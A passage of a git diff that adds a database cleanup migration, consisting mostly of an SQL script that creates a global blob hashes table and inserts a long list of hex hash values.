'DRY RUN' : ''} ${STATS.total} records ${STATS.replaced} replaced, ${STATS.skipped} skipped` +) +process.exit() diff --git a/services/history-v1/storage/scripts/global-blobs-db-cleanup/01-create-blob-hashes-table.sql b/services/history-v1/storage/scripts/global-blobs-db-cleanup/01-create-blob-hashes-table.sql new file mode 100644 index 0000000..05e0478 --- /dev/null +++ b/services/history-v1/storage/scripts/global-blobs-db-cleanup/01-create-blob-hashes-table.sql @@ -0,0 +1,14320 @@ +CREATE TABLE global_blob_hashes (hash_bytes bytea NOT NULL); +INSERT INTO global_blob_hashes VALUES + ('\x0002bcb29ab63cf63ea2a1184ac8fba8ad4ea85c'), + ('\x0003f8a3f3fdd378689a2b43a11645b7efab8fb3'), + ('\x000523b5135f7906791457f4d16af222daa46d81'), + ('\x000f7a0870f80279092351a62eb56b0d4ef76a61'), + ('\x00111e44854715b956d320009ce922c1aec0deb9'), + ('\x001178cfaa6539c8543a5940487ea13035ff3f4b'), + ('\x001341838be85823b4b1dbb6d05eb7cf8cae0df2'), + ('\x002147ba75e3ca66acc5a2db75a87e68c0d35b5f'), + ('\x0025e578e3aee1d8422df2baf2a8351e7bd252d5'), + ('\x0025f88e875bea45df7ebcb3fc6a035cdcfd1215'), + ('\x00309e45f488298149435a122b2de54682b0d1e2'), + ('\x0031cd62555947223cdaf48143a1c8faea181818'), + ('\x00321999b116755745f860848df5c02a46058a81'), + ('\x003cb2a8fe94990d726e7bcfd26c0a8127f37957'), + ('\x003f597aee7f69007664056b751a1cf02c20dda1'), + ('\x0042ea088fe39b2081fb3f07e9b2374128b267eb'), + ('\x004c3d06ffa20db01ed0d252edaab7742b4f9a95'), + ('\x004d63ff674404768d30de548d29483c867ee4cd'), + ('\x0050d3b0ba7d2a679a506964ade1b937436b98c6'), + ('\x005286233b4bce6ad0c0410be6aa3453fc6e913e'), + ('\x0056efbd609735712934e342450e4eef71e3d4fb'), + ('\x0066416583fa180b48503a5b590b99192860aa79'), + ('\x0067528a0634f0ae369a8c79956cd35524ad9dba'), + ('\x006c51f843374eab631493f02b06c554bf353fa5'), + ('\x007256a0c038ba0ad54d89b9b16887b24025d79a'), + ('\x0079e81766e6a62fe8903b2b13eff435dd8ce6e5'), + ('\x007a10e8b2547dfbb1742a4dacfccfa6edf0439c'), + ('\x007c52f10813305f1cc1ebcb0f32a5152c7d4320'), + ('\x008367616456f828e316fa5bd0388a8fb785b77f'), + ('\x0098f7b57075ae747b166646d42ceeb492da5599'), + ('\x009ba6e0f66a72cca1f4aadd5b3302bd4be7f5f9'), + ('\x009d53db689e7ec30b1431927433b1e377cbfcee'), + ('\x00a97b9e818f06c62eb6f1d2e26e6db5545f7053'), + ('\x00af802b66ccea4bd5fd26fad87f7f5c8c2ce265'), + ('\x00b1e1c78ac81a1dea01540232d49c813b63a759'), + ('\x00b597bd97a407d6c1b2da3828bab674ab1028b4'), + ('\x00ba1d31eb6e05f339005d02e8a196adafc8a9a4'), + ('\x00c50f568cab2ee52463bfba144c5d197128851e'), + ('\x00c9323f5a8d299bf596f409799f475f573d6cec'), + ('\x00cb3d2169a23b995bfe3de12354d07bc3c8ad7a'), + ('\x00cbcd4d1bce83a301fe3c23b51a08695a15f312'), + ('\x00d35648f8bb4ffd38fda8e4dfd88b0c64d9d1e5'), + ('\x00d45bf167505f106b89fb08671e4137aa890de3'), + ('\x00d541e8c43fd26276d24db0a17394caf3c86b88'), + ('\x00d7e3c061705c18c275f9556db792e3d38d9786'), + ('\x00db1d3c7254add7ad491c99899e36c2082d0368'), + ('\x00e5521132d65f8a2bc96f6a0411552dce27a883'), + ('\x00e6d6d53c706fe7c08a9fa02917497ff0574d19'), + ('\x00e7324096f3502f90da446a0da48e214f3369cf'), + ('\x00eb807029fbad2ce159193a6f0973700a7e7920'), + ('\x00f53cff5f50f51deafa18690ab4d9d8a826148d'), + ('\x00fbdb3662cd0d6002848c3186a28bb2a3359cce'), + ('\x00fc30636ab28039aca58a0993861050d946caa0'), + ('\x010c5f023cd050a1b5dbee5493036f20da79df67'), + ('\x011c123c620bb137b7e45b052b10a12085d18eb4'), + ('\x011e8c12452fe515b395ebb97cf732fb7cab3ff3'), + ('\x0126e37416bb49353f26841fba65a2b63972a779'), + ('\x0129ac8ed95c97949ea61e0ba69d6893be524a05'), + ('\x012dcd25c687a53c235de61d4fd6d111747a0b1d'), + 
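+  -- Illustrative query, not part of the migration: hashes are stored as
+  -- bytea, so to compare against the hex hashes used elsewhere they can be
+  -- re-encoded, e.g.:
+  --   SELECT encode(hash_bytes, 'hex') FROM global_blob_hashes LIMIT 10;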
('\x013857d219e5b84a298ed1043f7d215c3befd5c2'), + ('\x013cfcab5216eefc9cfa5414834dc2d2b6076f4a'), + ('\x01426f558712caa574163575157411447c43daaa'), + ('\x0146bcf5bc55340fc4243c74dba2dd12d24b07cc'), + ('\x0150e77308b734f28a0d647eb03b1b22413b342f'), + ('\x01514983e6e74b20f1356bb166174d945ce2eb5b'), + ('\x015285953f6ddcf4470842ec0273833df231a641'), + ('\x0155d241b3065933e4cb78a992650e2c04d028db'), + ('\x015ccb14b9cf7ac6dab7fe3ec8d231fd1f3fce1f'), + ('\x0174a7b6b2f5d49a68cb03a1d1dcacafa0a77b2d'), + ('\x01777bd4404c0e62a1e44eb0d76347eb3e519fbf'), + ('\x017cfb443e51909114c214ed89647873fc7ef382'), + ('\x01811fb4e10b8115ca25604eca6080a5a931af04'), + ('\x0187f9d33de42335798e0b8246a25b09c64e5ec5'), + ('\x0194fba7c500606453112d68089bd3e550328f74'), + ('\x0195d42ae479ed9527f04c204c3f0c40045dc738'), + ('\x019ca07bb01a664ce61a9bc80e7fb8f12fba84e1'), + ('\x01a51dc7d04301ccbb98b88931edf76bcedcdfa6'), + ('\x01a89f7e73acce78c7accfdfe738c9bd7c01857d'), + ('\x01b2d98566fc53591c64133ad2465e797e471b86'), + ('\x01b334a3ca5ef49354be5de0f3f6e6fc314c56ce'), + ('\x01b6b259b94508a25da019329508fd3839f2051a'), + ('\x01b8457ad7ba46cee30683a2ee12abd26ef33f10'), + ('\x01be74110a7497182820a82281a21d8389887846'), + ('\x01c0dab906abfe8f0a4f4248b998e97a38d53502'), + ('\x01c80917548a3d847638a90ad08b31470a8db66d'), + ('\x01cc9854cd638c968aa31ab214e7ee3a94148f91'), + ('\x01d0f5bdf7695b3d6ec6f43cfb6cfbc6438af1bc'), + ('\x01dbf51cb7cb0d9291c47fa07fce308f94aa5cca'), + ('\x01eceae29193e9c2287b312987465e722ada4f6d'), + ('\x01ed6ead5962ca3febf955ba704b34c6466f4cfb'), + ('\x01eef40c1353ecb6b76d95d642171851b080b0a7'), + ('\x01f735a6f58e7b278393a55ccca8b62f3cfd1862'), + ('\x01fc91007061f339fb10983adb8c4d30f366203d'), + ('\x02020ec9648330cfe3923e3c3451c10e77f3e32a'), + ('\x02022cd1b13dd2514adfd5ad7be6fc0910752fa1'), + ('\x020299631a0ee2ed2792d271cdc5a80b055051b4'), + ('\x02050cba99a42cf5f2629207df48a2e64fc12abf'), + ('\x020588f768a515eb8da744812adf0d4bd17114b6'), + ('\x020916c6581f5e846e67c9ca3679d4b34360c8d8'), + ('\x020c4f09330504209c9edeaf1af1ea4ea5c962ee'), + ('\x020f4d75a7259924a0496e9ef514f0388f09b271'), + ('\x02144d28910833b77a98b6299012881694f58ef5'), + ('\x021b49f74992502cee66ada8650e3ccaf68f3917'), + ('\x02284cb5fb07eace3866a8d16656fcd88c176367'), + ('\x0229a9d03a0c33295340c95d464de8f1d5e97bc9'), + ('\x0231bb284b927936c82516f01b24e4d05c8d3331'), + ('\x02322c3162335e1c44b85b2d363ad4c938aab044'), + ('\x0233b1a4906f27244bd3f23ea511faa78a40d451'), + ('\x02388d7fb3d4414da87f535ac120f081b399d1b4'), + ('\x023da72cd18f2319f4afdccc4f79da20a559e8df'), + ('\x0240aba349d512ae0b8eb7382c26ba634807bd24'), + ('\x02455c15192b293936ed8e27eecf8383cabf522b'), + ('\x024745c88fe855c6c8540badd2d4b05b8a2016b3'), + ('\x0248da97307110e61ca6e48164e3662f2dd11e62'), + ('\x02493e7658699e49a4b02371142317fda8c6b4af'), + ('\x024bfab11983844b7d685ecf774dcb11af94afd3'), + ('\x024c5cf33ce75b2504e61b6f0512ea889f7df9db'), + ('\x024d5130039023726f8ba5a1ab48b42f1de784be'), + ('\x0251ab27cf867ec9dfb1f0d93c84b4662e668d67'), + ('\x0257b4fe747acf1e8584089beeb5256b5330ca7b'), + ('\x026b67c7e344979fa7171eba1a72e83198dea585'), + ('\x026f841a425b5dc4c3e9e5efa8157425c9dc3794'), + ('\x026fc481b135cdf7386ae0d14a08046795b269c9'), + ('\x0273af6ba917c0f9f5e1a836ecb88f6fbb2ecef1'), + ('\x02748d4ae22dfc9a93e69555d2d8ebbb1f37bd9f'), + ('\x027dd181fb145ee6ff2a03231ca40e4e3270a9b8'), + ('\x02828718078500fc15ebb244ec5ef09166e73480'), + ('\x02881a567ee2248d506166ae2182bb84c65deb97'), + ('\x02888c275e2d41b1213446e432bb0d2d606fd51c'), + ('\x02899c619149f488ddf6e8d1e786ba24147409f0'), + 
('\x0295a5ba698f3bd7af36e3258ee7f0b33094154c'), + ('\x029cd1dd853d6b212a9c571c11967cf74330cc3a'), + ('\x029d6936c86fb21484e90479402ae96c409f2e03'), + ('\x029d7d780ea75c77d5b0a6f88862b61e99e70012'), + ('\x02a698c22cd3c1adbefa674997be2444f702880d'), + ('\x02b1dd8738b6322f111b44f9e5b98f06f536bddb'), + ('\x02b3464b5925a78f09bab96f6f5df278d093b905'), + ('\x02b69b4fc8ddc5102ce2023c5347152619e92fa2'), + ('\x02bb307bd2670ed0bab10f2029e78ab6afd6750d'), + ('\x02bed0adb604dbd438d8b9f28b1d32fa9f8753bd'), + ('\x02c0c9f9abd453b4df7e4cb836d550d24ebd45da'), + ('\x02c3d6ac89b22b58d5606ce28712cc65c62edac9'), + ('\x02d4ba6bf2822c9121c786b08cdf4a5cf59b2a46'), + ('\x02d78b937c3a0c20f8e5e7fdf6f0c54dd70ac8a0'), + ('\x02d8013ee2954696e6013a2db9d70121e4ddad6d'), + ('\x02d906792ae8bccfc558a30c5f862407ae50acc7'), + ('\x02e670a22726512b58951381b06f1e96461a0add'), + ('\x02e8c995b5b10516688319d37183368ce4ce5995'), + ('\x02ea4f434516377f6198d7eb4a8a0eff101e8e2b'), + ('\x02efe47ab2103913ccdb69cc46c0681bd7faeebc'), + ('\x02f1569823afdc7a279c8f1fc5567e7a3d35214b'), + ('\x02fdc89398788d1e277d7b59f617f782c7c45c70'), + ('\x030039a38cd8ea34f683fd752af53f03dc8a1067'), + ('\x030076bfda268a04902bceb7906039baa8460cb5'), + ('\x0308fc869680014ef3740515f4504d8766924dd1'), + ('\x0309b9c4d38b61dbccebbdcbdf0545fbec451ee9'), + ('\x0309c9eafaa1f874f972c21c200161d7da63d2ae'), + ('\x030c33a87d8de5dd9848959d975b2fe03be6fe67'), + ('\x030d63e37f76904e38a1e5f295cab17f9a9c0a46'), + ('\x0313c454139eb2d7eb2281ced0be78973ee95004'), + ('\x0314f9427bde3744955de9eeacf904964637cbb9'), + ('\x03168dd8a4800756eaa98bb05e6ee4c8c24f3d60'), + ('\x03174f371a164a47bb7761c4b338b1eb925f1d99'), + ('\x031b02aced1ee1e7c9a789e2d328fcbe6790ed01'), + ('\x031eee72c36a24ed9dad56b6a735529f3993a241'), + ('\x03264d8239431d794fa79ebc6a3cdf62496d2973'), + ('\x032cfa705cb479900e22aad8a6c570f569fbfb56'), + ('\x03346a80b27a53f8e116f5e01eed15aafb67d154'), + ('\x03361f6a40fbe4bf55c1855770edd2b5c15eb8cc'), + ('\x033a64e91de22118b571c0b43680b0eea8d2e3e3'), + ('\x033c171804901d5ca433d9041ecb840494c879c1'), + ('\x033c385d0c6389ab19b281c56ede48ecca289227'), + ('\x033f0c862e242086d238a6f3b731f5efbf822105'), + ('\x0342674234711f14c29da1a251887dfcafa66847'), + ('\x0345400a372eb73d1905a4f826aed48d3d60ee8b'), + ('\x034b63756c7579e3dbe22f358633e906a2cb6a1b'), + ('\x034d83f96baf177d921c0fc38a2c7eca7f458fc8'), + ('\x0350e06d43552a71f7fa3b8e7913f741e296173e'), + ('\x03561223bb21951444f18e88d995d1179fa3980c'), + ('\x035c5baa849c1ca6a303faa88d6862966a8d4ff4'), + ('\x035e9bcbee9815b02fd44455d665e61f9bdbd756'), + ('\x0364174083a4002aad0cf638ed415ec817c25fec'), + ('\x036c45a24cc508847bd7af191ff0226ee93b87fc'), + ('\x036ed3106f99b582d8c88cef1c23dd91f4b899a8'), + ('\x036f9e24ec707a8e9b20efc47f1d010777cb3e73'), + ('\x0371b41681da8f315f72ec2f8344daab4c23330f'), + ('\x0383717c8b6253ddcde86714a561bb48c39f5280'), + ('\x03843ac02cdfc0de537d1ac88b8f380fdc4070bb'), + ('\x03873cda44d924f136df2bbde420d22553fe4780'), + ('\x038d722b1395fae5b3451e608d7ed61fe1d920c7'), + ('\x03972b56fe0df9e09081218525f7ce56eebce207'), + ('\x0398666e9ddcad3d4e68fa0dedbe914bf614fdb5'), + ('\x03a3f11dab138c2bdb163a5342a87790b5aa8c72'), + ('\x03a6d38561757c6d11364747f919e2131b675dd7'), + ('\x03afcacef6f9e812705c63f67ee6b51429a78235'), + ('\x03b461eb6679407536fec4a5ec5f854e73ef606a'), + ('\x03c17155fefd756b2647b44f19e7d14e75099c51'), + ('\x03c191282c15ee966b4eafde44d6cde62816a10f'), + ('\x03c1cf9d7fdc10c57d67cae4103c495f0006bbf0'), + ('\x03c3188fc6daade5dcefbecb476c71e309ffd6b6'), + ('\x03c63ebad3ee0fe21382b98689d93bcb4ff0df8f'), + 
('\x03c690eec3dc8b536e7970518b8073af23bd85c2'), + ('\x03c89188ea3cf6b2a012325c1f37aecc514c201e'), + ('\x03ca151a361f4b03c8a5b51b3b05c35bc1921630'), + ('\x03ced1a5cdbc77556cf68bcccc151dfe3874717c'), + ('\x03cf1c0aeb1729ffc1c6aeaa679260877f89d845'), + ('\x03da92a9f5a5b8c4a0f35d13e83dcf4d57384ed8'), + ('\x03e0b68cefa6f5abedb58cefec0a0cc6e85c6253'), + ('\x03e57511cfecdff8970fb0d53ae91855935600a7'), + ('\x03eff2c1783428ef9d6a1f51f73e8036d97eacf5'), + ('\x03fb542875b4ef7b9133f5e1a67af4b2e27faa73'), + ('\x040102af3e52fa1ceb3d8575975ccc659cf65bd1'), + ('\x0402ac900d946203545af3e17c3e6b710c2fca28'), + ('\x04031e41ee23d0c49dfb5f44a1158ee193bed003'), + ('\x0404fe8609ae92ed84e5d95ebc881ffbcf4ea933'), + ('\x0409c2c8e93137029f9de5f965d64d4b8637ce71'), + ('\x0411d3c6820874a38d36fa8e033b5a9850d78020'), + ('\x0415921b0dbfbc5c082f9f48a73e30833a1bb42a'), + ('\x04194147f71f71efca20b606779a64cb3d1466bb'), + ('\x041ae551724550f7d17a0c018559e1c04c6fc80a'), + ('\x041c2e4207502164235783036d07e6b2f709f694'), + ('\x0431abd51b98c7b3542f6de44cde58cc5c02e3a9'), + ('\x0433daa19bdf27b018dd76432597b6cb132a86fb'), + ('\x04346a1228c00ed33cc4d0c6a0445f247b113416'), + ('\x0439096ab607f5cbb48c49b609c2c0478f13e6e7'), + ('\x043ecc268bd5d295ae21a19dc5862e82abb902c1'), + ('\x0443178d186d59e3df415b529d936356eba29d70'), + ('\x044a4753a02cc244ecb5614c794f457bc4630354'), + ('\x044d8880699b82883408e991f7cc54c87a18335e'), + ('\x044dde929745d48d13601b572a0f586728ebf0a4'), + ('\x044e8896500678342232918da5cc3da4946af9f0'), + ('\x0454aa4e9750b994c2e552b490a004781cedbd9a'), + ('\x045526ad3f0981a0c090c35ed3154c5eb52cae22'), + ('\x045b0aefa2475fbc5b6139dfcbeabfbc39221ea1'), + ('\x04603150a01a7bf239e00732ace30496baaffe8f'), + ('\x04687c47a5e9d35c5d61077460d3fd3cc7bdb727'), + ('\x04750868af72916449754ea00654e81f1b44d3b6'), + ('\x0478c4ff0f9932fe9c942af364e0b16da8d2b71b'), + ('\x047beca0adc54d7750c54af702e854215eefcf07'), + ('\x04830e7e1b1b82d07efac042cacef6079c076fa2'), + ('\x048d3c255a3d0ac6810e984ae137eebe57e0c425'), + ('\x04976b28928cdfab18009ff9dc2c8c0999c501b9'), + ('\x04a1d5245f3678246a65bacd584d0983822a3851'), + ('\x04a8275ec18161de8909a1653c4ddf1807b05844'), + ('\x04a8d84cfb4b27f7e7ef8cfd7cdcf74ca2eb6fca'), + ('\x04ad305b755f7af07705a71f932d599b7119e342'), + ('\x04ae0152240a9d7de845ce223a0cc803d033a280'), + ('\x04afa95de4ef3612a8ab372c491d149361815f64'), + ('\x04b4f412281d12f25e72a10c230c8c46f0795c23'), + ('\x04b77fdecd42817abcfac278c2b3d64fd173fdf9'), + ('\x04c3c9142f0bc3852ad30889bacf05d039d1ced1'), + ('\x04c5bd0227959078fd34ecb1f120042a16468015'), + ('\x04ca2824d8d91966605a9ab8a37631e239724277'), + ('\x04cc67ddc33f1b31ae62ec3c0cd443ba0c1dfdd5'), + ('\x04ce21813ec13a7157b1fb3071d5f69ea8864e8d'), + ('\x04d1bbc4597237633cf7c28486f0980d7e8acfe2'), + ('\x04d3fedcdb4555807b0158cfbf5eabd51b5ba505'), + ('\x04d5ab5efb5af71b0a33da0af9051ebf643fc341'), + ('\x04d6e5d68cda1d846e51eda87f24e411e9b90ab4'), + ('\x04d843410127e1be42245961b910be811e935fbb'), + ('\x04d8c0b2800dfe7aad2ebfd3fdace8241543b4b3'), + ('\x04e139e9a044540dc819e77af3d99ac9e25d5b83'), + ('\x04e3ad8f8c275e96e7f3c839e1540a36c0459728'), + ('\x04e3c7cf677257b43c3381a3db36233cf5cf8721'), + ('\x04ea8efb1367727b081dea87e63818be0a4d02f0'), + ('\x04ec472ef658bbc581afac408d8fa142d4fead55'), + ('\x04f7f0cf370ca47b0ccfaeea6b954878c4b2f769'), + ('\x04fadfbec4d19b71e2a95753f0a4152316b48bb4'), + ('\x04fd7fbf1cf005a13586f43dd845bc0ed04220fe'), + ('\x04fd9b717411241f003e3fb299ad8f113f5379b3'), + ('\x05024614ca5a145f6812b7e8bfa163c5ea603d4e'), + ('\x0504b25dedcebdc07b6214fd03bd529a4bc77136'), + 
('\x050710a10a2ddbbc35553c3446a512c0354bc4e7'), + ('\x050d04693f1f7af67c3f51a28148dbc523241ff7'), + ('\x051125deb27b382e1cdb08e7bf2beb4f422f8c9b'), + ('\x05113ac2b3581774440d69d16937647a9aec0047'), + ('\x0523922e95e1ada1e6f799492f55c9ed1cf92901'), + ('\x052a5fc5937b7e3ebef35003c2b09884ab80a952'), + ('\x052e934c71dae1c84506a03efb5bd0ec667c0411'), + ('\x0530a5b021803106210aa92af8e2b92a66731965'), + ('\x054c8877261401487016db0a5a2eb0bca1e76eec'), + ('\x054dd530f3d687e755f7df2725df9b25d7e38f1b'), + ('\x055617dff76ff174197b0fbca95acf06f61280a6'), + ('\x055b466208de1c4091012b3a6c798c5133037441'), + ('\x055f19936c9883af5194a4a7593e45ba4226a969'), + ('\x05601a82f3d625fe059ec406b516dcf1fc41a2f2'), + ('\x056c0ba903d81b1563a1b309623411f2b61990f9'), + ('\x0573181f4069653e871ff3cae4650bf432512127'), + ('\x0575c72fc021ed6d133b201a4e8fe43db250733a'), + ('\x0579f456bd26aaa321b2a74ca85f0e03cc37d83b'), + ('\x057e884cf462bfdfe66c2353b6efa6337931d2f8'), + ('\x0580633a1b3ec06613c68eaa03ad8e518d0958e0'), + ('\x0582692a8040c30b114663562d4c2d620b0f20c8'), + ('\x058caea9cec84245f5d14820a66bf35a309dc34d'), + ('\x05920dd9fddfd88a7364e18fca6e5fa04a2a687a'), + ('\x05925ec0011f3034afb1140389cdf95676a3eb00'), + ('\x0594882854daacfe89c3f3bf58a041fc22316c36'), + ('\x0595d8255fe6c68f30d38ec2711a9897ab700658'), + ('\x05969b18deb5a084fa0ba26866c912a30516c357'), + ('\x059eddd8cefe7af5df2965b0636abfd64142da3a'), + ('\x05a2f299571545fbbab6aeb2a59fb29b05c2486f'), + ('\x05a3cd718d4053e9e902a44f67864c581f9f3dda'), + ('\x05aff4d863cc6342d81f1c0b30fff4a38bd60e6a'), + ('\x05b7eec04dbb3d78b251f5fb270fa15a2f8549bd'), + ('\x05d8d0125b4993c35e4aabd6b0cc7d76f4b5b6a4'), + ('\x05e41c405d17dad31ad25722ae57e71da956425c'), + ('\x05f4383de2a48d6cc6a5931b58f72b042fda425f'), + ('\x05f9dcf2e296cc85923505857bd24393946d51c9'), + ('\x05fc9b7edc5997740b9f46a531d6375c1687049c'), + ('\x05fdbe6d7686deba7766cb08d43626de20a4f50b'), + ('\x05ff3a02f6283189045d3501967afe4fe6366feb'), + ('\x05ffff5d2cade75b635dc6213a1de431312477e6'), + ('\x0601683c9f67c7cd0401b3734bace92a4506984a'), + ('\x0602bc0df0a93010438306cb024517d6fd1662ba'), + ('\x060d225fa834621d3ea987c272e6d4ab4e1bcf0e'), + ('\x060f337172152eb5e9121c3e697ec016ed63ec8f'), + ('\x06112ab06886c0a751cee1f599e45ecb2df3b666'), + ('\x0617c43c6fb80d4bd2360f499e7fcf0730d250bd'), + ('\x06188f473a029a1f64633fe5bf559d0e7c47afac'), + ('\x061a8234d2ef738590f3a0d01a61ec4d61a945f1'), + ('\x0627166b623668215a47fad3848d50a4583ad587'), + ('\x06297d9937e88eb254121787ea0f4121c83b3127'), + ('\x062c024a3429d6fb739ac336324cc5ef31a9dea7'), + ('\x062c93953cbd9968d65cd61990bf8114afb4926a'), + ('\x062ed2e9726cf6dd9901672674e4ac958c2559cd'), + ('\x062ef8bc974269b1f644af72fd33d07d4e31cd85'), + ('\x063f9564054742d4a57979d4aff7969abf5af9de'), + ('\x063f9d82a55ca6f2767a62cddf0ce9f4edc02582'), + ('\x06509b785473bf333659a972a845676c6f552540'), + ('\x06574d0a1fda5c244ab0404b1fcaa0dd95b7c527'), + ('\x0657fb0f4ab09254a454ea27bc9e08b637053886'), + ('\x065a98ff1e400313a99dbca51e19fe5bd9c3a5f1'), + ('\x0660b050d27995e4f3080977db8743706d0d7369'), + ('\x06632fd7f5f19f6bd4d61c4d3ded0549b59516aa'), + ('\x0664dc407f1d7818f06dff7eda244e2a2e3d52fc'), + ('\x0668f931945175ca8535db25cc27fa603920cc3c'), + ('\x066b6d4e538f19b5f8099c401031979b75b9a745'), + ('\x066ea5f0fd98be48e13b253eb0dda9ffcffc11db'), + ('\x06718ed6c1fc325e5ed747634d5d254057fa9a84'), + ('\x06738674d4e35bd845bc08e5564e0066c0cf2ecf'), + ('\x0678839bb58897658a00ba22c4f66f94b95aadfd'), + ('\x0679841e1ab42648014bbcc31aab351e64c4068e'), + ('\x067dda54cf810187576fa1cf104f77c1c05720da'), + 
('\x0687fd1e3e06a617e20f7597522b267864db20ac'), + ('\x068d8589098df7f9fd130fc324285d5a9602cf44'), + ('\x068f2ea8c49d9ea0910482c2fb72248e2ca9f8f7'), + ('\x068ff0e74b03fd7b9185515f1d01bde4d66c72fc'), + ('\x069802618801661c3715cbfad2b1557495e1b83d'), + ('\x069fc85bd7d7cb98eb1cfaf4b6be03de4e4c2f07'), + ('\x06a1cd580ffdc61e01fd5ac61f54943394dcc122'), + ('\x06a5bb0f9d09243ce6bf7d2085bba41abfbf8f2e'), + ('\x06a7a6117d3efdf23ec2c63f046aa32fc13d752a'), + ('\x06a7c9ab528f769fa3dde9dd1d5831aaa50e1354'), + ('\x06ad00011a727e9ff263ee685d974021cbf6185e'), + ('\x06b0cfef8094132fb4cc4fcba1f43fa2cad92403'), + ('\x06b0f85bd893fdafcf12884d4c11236b3a11bb3b'), + ('\x06b29dfafcc6e06d154fc0c7be3c68fd7c0e909f'), + ('\x06bca61ef1b2edea7aeb80a11a4168864fd74204'), + ('\x06c1905a0069f10595041f5dc4f70e9d60a2f104'), + ('\x06c5b540bd78339f51d0e7923f69205fbf789ab2'), + ('\x06c5c5861f6621dd44a9e697d85d463196f582f4'), + ('\x06cd27148ee551bff90fe2b52d97fd9e0062f0a8'), + ('\x06cef5ff777a14a56fe70af934fef9c9f62df580'), + ('\x06d280e934de0ef274f37798e94127418965a670'), + ('\x06d4033e5c77da843b142752a7d66add3106e636'), + ('\x06e0e2f6523554efca40e54d8c4501b0c704074f'), + ('\x06e250c7b3adec158cf18ce473f406f67bf00049'), + ('\x06e2a03901e3df1636d13e47d7de9f18e4b369a9'), + ('\x06e60dc78a21607092905fa1573cf31db1315dfd'), + ('\x06e9d63ecee942ae63876037c10108a12c304a32'), + ('\x06f32c281d6f23a37b3f40e7b19ba2dba03a16a2'), + ('\x06f3bdc9c00dd0a1cfdbe40cee9d220cb22d1778'), + ('\x06f4b48d7aac4758900d7e2d7e1d284be1da6159'), + ('\x06f50168cf4640d43c2d78be85e61a096e02dd8f'), + ('\x06f5785da5b536749712cb7ffa4e4668356ef376'), + ('\x06f76ba06b8577fcf4d90de81ffa6efa8d9ce3cd'), + ('\x06f96da5ef0d1e6a259f182f57aa7b27414e656d'), + ('\x06f9c58123993fa447aaee1d82fc23a6b0e42abf'), + ('\x06fc805d103aefe05ba1769a1b08a16039cbc542'), + ('\x0703f1b41b90732f4145d289cfe5cbee51d8aece'), + ('\x070465a82800f00b1ee250cc356ac03cde9178cf'), + ('\x0708c517ca41e638ed1a79dfb139dbbf3e5e8c92'), + ('\x070c76ed2641f62970a7c105e87c78196570e8ee'), + ('\x0712a0356fa8c2d1fae06326b8c497995998cee6'), + ('\x0712c3f6c249205a562769eea13f34b720a8a09e'), + ('\x0718ccc52dea057fcabc3f24fc2baee6a73fcc98'), + ('\x072b6a11d602d74cbf9d27e5f8006ecc0db51091'), + ('\x073ab95b88ecf561fc64ac5e681d6160d89dbe44'), + ('\x07410a3754a5e3f7abd56ef3984f46b606cea083'), + ('\x0742fa1845ee72c764a779b28e21ce38183a0c65'), + ('\x0743ae5de69b0b24c234e1ea66a8968150cfb53f'), + ('\x0747c67faf391ea5b2d2d21cb520cef6a2ac90d6'), + ('\x0748aa4b58a95fa7654b6e4a8ed531baf61dc5a1'), + ('\x074a54201584b101ee817484120452352c024d19'), + ('\x074d7ddd1b9962769b5bddb628b9c0e4511d41fe'), + ('\x0753b81e25eb7edd190611df7c05775cef7b1344'), + ('\x0755da4d59e1ca1ac2e242a2d7ce96aaa6243283'), + ('\x075641a2caf407e796945fdeaa874b0a5357c09d'), + ('\x075a0d9f8eb91e5d797baa1077bfde98eb1c6824'), + ('\x075dc83cdafb69fbe902792d1410650dfa191ff3'), + ('\x075f8512e27e72a7f4b43797138d7492af17dd95'), + ('\x07610d602b5028d3fbf3c87cd34a23f4e2e6d066'), + ('\x0761c773c079222a5e983fa10e5276a49fa01635'), + ('\x0770059b12ed2740a55d96238cdccc86e8a72777'), + ('\x0773fd921a4dfbf3ac00b5bf2a086b96fcb4f9ab'), + ('\x0777cdce522ebb770830490842fe14090119cb8f'), + ('\x077e911ec5d4c7423cc9ebeb47ceff7c1303d910'), + ('\x078fc04ffa1b8d4bf0d0d5df722788cf2b195c37'), + ('\x07949dc1103b24c85b24fe388c3c351fd956e7e8'), + ('\x0795a31353a8694569f7bbc8c15f3fddaea1e824'), + ('\x07a1946173a49a83d54cae2f885fccd5519ed2e4'), + ('\x07a5fd368d4795427095a1305d5a7ebd9554946a'), + ('\x07a72880ecf6f982aebd400289cc04b1acb1d137'), + ('\x07a9260cad8b4b69c45e589832595203dadfdbea'), + 
('\x07ae73e55a449746b7e376c57765739a565c0529'), + ('\x07b69444f08315f4fdc92fa15404903213adb4b4'), + ('\x07b6f9ae6db76074988b931168b4212bf89fa80d'), + ('\x07bc8eb3bec2bca8fb3745313a31d4e36be03234'), + ('\x07c9583f05b21257a4baf6ae40595c622c69c83d'), + ('\x07d537a73cd0329fd9068e37fd60863133dcac01'), + ('\x07d67e26e22354194798329ada91b9502dd925f4'), + ('\x07daf3adeb81b961a747b6ec2e6970023d8f21f3'), + ('\x07df451789f6e92a026c77e3554313c5c1582a8f'), + ('\x07e4d7d6bce9a17b57aa2a5cf2cc72a6a8f32f58'), + ('\x07e4f14096382d4851536526329fee8bb255eaec'), + ('\x07e779d54505fae49fdb33cf0894daef08e2cf79'), + ('\x07e8874e40b45a29ae4a74f234c49d8da82814e0'), + ('\x07ed906c9f2de07822f1d6266423895fbc6ed3de'), + ('\x07edd82b4951c6f321ceeca501ecc90709d875a4'), + ('\x07ef4380c1dc8e0102bcff151785d2cfb6856c49'), + ('\x07f380cab59796eaaaebea429da7bfd91feeab5c'), + ('\x07f7ea438bcc6a391a81fe96834d76b1722b72d9'), + ('\x07f9f287fb465f7fc70ea55a7f3ab8a9196ca14d'), + ('\x07fa25158221f991ea68bf8494f18842b57877ae'), + ('\x07fbd158cfa4f3a6e643629420e9bb9f5d53a182'), + ('\x07fd1d7ddc6a5121bd8c5756443fba6a6de2ece4'), + ('\x07fd88812a165e7fa3713592a2f79e763257e9de'), + ('\x07fe3ae4317c2cf939128ee7c0b8053a468474b2'), + ('\x080723f6ba1d5c27743d154ea87f065e9e73c824'), + ('\x081671b6aa225a2b8431248df67a32c91c7bfd6d'), + ('\x0818d5c01d33479fb8cc7741aaee673fb3670695'), + ('\x081952dd477b53623044f8d86de07136f9c58f4e'), + ('\x081ce34749400e841b4e2802a8d52edda2d6e136'), + ('\x081ee72f6e9f03babc56d9e2bd3ee334ac4868ce'), + ('\x08218ab946b6aa7f1775f8afc3167e922e6897dc'), + ('\x083823c998328c049448680831a437b3fa0d18d3'), + ('\x083909a9cd7192f3a5d924d8ce0cccc0e07e1a24'), + 